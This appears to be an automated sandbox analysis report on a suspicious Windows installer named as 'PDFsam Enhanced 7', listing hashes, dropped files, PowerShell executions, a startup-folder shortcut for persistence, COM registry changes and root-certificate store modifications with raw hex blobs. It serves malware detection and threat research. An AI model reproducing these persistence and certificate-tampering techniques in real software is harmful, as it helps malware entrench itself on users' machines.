697cb7e261bc5afa0968304b1401b1d8219ad4f6c734d3fe1bde0aca1e626894

Analysis

max time kernel
121s
max time network
127s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
15-12-2024 00:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe
Size

111.4MB
MD5

4112664345f851b2f3e1b7f19fedd41b
SHA1

871f5c20f9af3e77157d88e5b518f0f2d506c3a0
SHA256

032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec
SHA512

3d9dfa5b04106c113e99f6f57645c702b85a802489773e804aee287ef2cd28b3d04b59ab121d32222c066ce46812adafdb86e1f3d1cf0a7b20ee35f752277571
SSDEEP

786432:Q22mmvNTsec3E9shN1ew5A5BMvj2222222222222222222222222222222222222:HFmVTTgE9QA5G7u

Score

7^/10

discovery execution

Malware Config

Signatures

Drops startup file 6 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\MIcROsoFt\wInDowS\sTARt MenU\PRograMS\staRtUP\a81132a821948785c704c56b34d98.lNK	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\MIcROsoFt\wInDowS\sTARt MenU\PRograMS\staRtUP\a81132a821948785c704c56b34d98.lNK	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\MIcROsoFt\wInDowS\sTARt MenU\PRograMS\staRtUP\a81132a821948785c704c56b34d98.lNK	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\MIcROsoFt\wInDowS\sTARt MenU\PRograMS\staRtUP\a81132a821948785c704c56b34d98.lNK	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\MIcROsoFt\wInDowS\sTARt MenU\PRograMS\staRtUP\a81132a821948785c704c56b34d98.lNK	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\MIcROsoFt\wInDowS\sTARt MenU\PRograMS\staRtUP\a81132a821948785c704c56b34d98.lNK	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
2804	CMmnnjAi1984unbd.exe
2968	PDFsam_Enhanced_7_Installer.exe

Loads dropped DLL 7 IoCs

pid	Process
2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe
2940	regsvr32.exe
2804	CMmnnjAi1984unbd.exe
2804	CMmnnjAi1984unbd.exe
2804	CMmnnjAi1984unbd.exe
2804	CMmnnjAi1984unbd.exe
1996	DllHost.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2884	powershell.exe
2724	powershell.exe
944	powershell.exe
1240	powershell.exe
396	powershell.exe
2928	powershell.exe
2328	powershell.exe
2976	powershell.exe
2688	powershell.exe
2748	powershell.exe
2612	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMmnnjAi1984unbd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PDFsam_Enhanced_7_Installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C310D253-8068-41C9-9A73-76F5DE090612}\ = "DownloadItemMonetization Class"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{38F67915-B73F-4B56-9582-A0CEFA6DBA98}\ProxyStubClsid32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{B9951114-CFC8-49EA-A542-3FBF0680B846}\ = "IStatVersionDll"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{03DBEE9A-62F2-4251-A167-73EC96DA12E6}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{01FA4F97-1E18-44DF-9F56-48B6F38160FC}\TypeLib	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{981CC4BD-3A05-4EAB-9080-0C3B6BD6A713}\ProxyStubClsid32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0084E94B-99A0-48F0-ACC8-3EBE184C5A7A}\ = "IInstallItemMonetization"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B9A7DB4F-2333-47B6-B9F5-C691B37D13DF}\ = "InstallItemExternalApp Class"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{6353CDBC-202F-4A5D-B42E-B7F6A208932B}\TypeLib\ = "{336A1FBB-E907-46CB-9FC8-42DAB7C05E70}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{484B7414-E690-44FD-A410-CAB40C32237A}\TypeLib\ = "{336A1FBB-E907-46CB-9FC8-42DAB7C05E70}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A30780E-810C-4D09-814D-6A5901ADA2EB}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{67876F29-EB73-42F3-96EF-C803A2F5F597}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7D738DB2-3488-4C17-B36A-5173D7D764A9}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A869D8E5-32F1-4706-96DB-C05D95FD4A5B}\ = "DownloadItemModule Class"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A869D8E5-32F1-4706-96DB-C05D95FD4A5B}\InprocServer32\ = "C:\\ProgramData\\PDFsam Enhanced 7\\Installation\\Statistics.dll"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A30780E-810C-4D09-814D-6A5901ADA2EB}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BD8871F6-CBB5-48B4-999D-B42E3471C98D}\TypeLib\ = "{336A1FBB-E907-46CB-9FC8-42DAB7C05E70}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1CC97948-6253-4F2D-BF73-18AE946E3DAF}\TypeLib\Version = "1.0"	PDFsam_Enhanced_7_Installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{D1C14C37-7707-434E-8D35-5F2D38964D4C}\AccessPermission = 010014804c0000005c000000140000003000000002001c0001000000110014000400000001010000000000100010000002001c0001000000000014000b0000000101000000000001000000000102000000000005200000002002000001020000000000052000000020020000	CMmnnjAi1984unbd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A6E6AE93-C1C5-433E-BFAA-857884A00D68}\InprocServer32\ = "C:\\ProgramData\\PDFsam Enhanced 7\\Installation\\Statistics.dll"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{702AE733-1472-47F4-AB6B-6D020633D689}\Version	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B9A7DB4F-2333-47B6-B9F5-C691B37D13DF}\TypeLib\ = "{336A1FBB-E907-46CB-9FC8-42DAB7C05E70}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B9951114-CFC8-49EA-A542-3FBF0680B846}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{484B7414-E690-44FD-A410-CAB40C32237A}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B476F162-E20C-49CB-814C-AAD62AC7ABC9}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{12210765-45D5-4720-B989-C8928EE9A3A9}\ = "IStartItemModule"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{91C65607-3623-45CB-A3BF-10A60F9685FB}\TypeLib\ = "{336A1FBB-E907-46CB-9FC8-42DAB7C05E70}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{981CC4BD-3A05-4EAB-9080-0C3B6BD6A713}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{981CC4BD-3A05-4EAB-9080-0C3B6BD6A713}\TypeLib	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A6E6AE93-C1C5-433E-BFAA-857884A00D68}\AppID = "{77EC23C5-BB68-4A7B-AE5C-F4AD0B6C678D}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{966A633F-75E7-4844-87DA-665046381376}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{38F67915-B73F-4B56-9582-A0CEFA6DBA98}\TypeLib	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6D97233C-AC4C-4B6C-BC2E-9E307351F9F6}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BD8871F6-CBB5-48B4-999D-B42E3471C98D}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{56C4EDBE-82CB-4B59-B4FB-F7DFBE6E67AF}\ProxyStubClsid32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{77EC23C5-BB68-4A7B-AE5C-F4AD0B6C678D}\DllSurrogate	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4EC97C60-CFF5-41F0-B49B-9E786C891518}\TypeLib	regsvr32.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7D738DB2-3488-4C17-B36A-5173D7D764A9}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6D97233C-AC4C-4B6C-BC2E-9E307351F9F6}\ProxyStubClsid32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BD8871F6-CBB5-48B4-999D-B42E3471C98D}\ = "IDownloadItemModule3_1"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{86FF4A31-02B9-46B5-BE4D-F741207A89CD}\TypeLib\Version = "1.0"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{6E90C899-DD9A-4E66-817D-6C1974001B29}\Version	PDFsam_Enhanced_7_Installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\.zicgbtmcwgd\ = "cjayjhdatevp"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{03DBEE9A-62F2-4251-A167-73EC96DA12E6}\Version\ = "1.0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{38F67915-B73F-4B56-9582-A0CEFA6DBA98}\TypeLib\Version = "1.0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{99A7E6B4-13B0-4C02-861C-D8800657F9BB}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{86FF4A31-02B9-46B5-BE4D-F741207A89CD}\TypeLib	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD2DDB7C-DD73-446F-BAE8-FA8D3AA7AEEE}\TypeLib	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{181D3DCA-28AE-4392-876D-5DD31CDADAEF}\ = "InstallItemToolbar Class"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{7790D212-75A7-469B-A3B5-9F32E598D433}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{B0EF82CA-662B-4DC6-A4A4-33D2EE9AF558}\TypeLib\Version = "1.0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D16B343-C0E3-4492-9122-BFEC46391E58}\TypeLib\Version = "1.0"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91C65607-3623-45CB-A3BF-10A60F9685FB}\ProxyStubClsid32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{575D7782-AD15-4B78-ACFC-749BA5ABE1BC}\InprocServer32\ThreadingModel = "Apartment"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5887D2B7-4C1D-41FA-889A-0179A2B37687}\AppID = "{77EC23C5-BB68-4A7B-AE5C-F4AD0B6C678D}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{6353CDBC-202F-4A5D-B42E-B7F6A208932B}\InprocServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B0EF82CA-662B-4DC6-A4A4-33D2EE9AF558}\TypeLib\Version = "1.0"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\xpuwjqhmhsnxkcl\shell\open\command	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{083EC4E3-C4EC-4924-AF43-F1AFF83CE9F1}\InprocServer32\ThreadingModel = "Apartment"	regsvr32.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A869D8E5-32F1-4706-96DB-C05D95FD4A5B}\TypeLib	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0084E94B-99A0-48F0-ACC8-3EBE184C5A7A}\ = "IInstallItemMonetization"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{575D7782-AD15-4B78-ACFC-749BA5ABE1BC}\TypeLib	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{966A633F-75E7-4844-87DA-665046381376}\TypeLib	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1CC97948-6253-4F2D-BF73-18AE946E3DAF}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	PDFsam_Enhanced_7_Installer.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	CMmnnjAi1984unbd.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	CMmnnjAi1984unbd.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	CMmnnjAi1984unbd.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	CMmnnjAi1984unbd.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948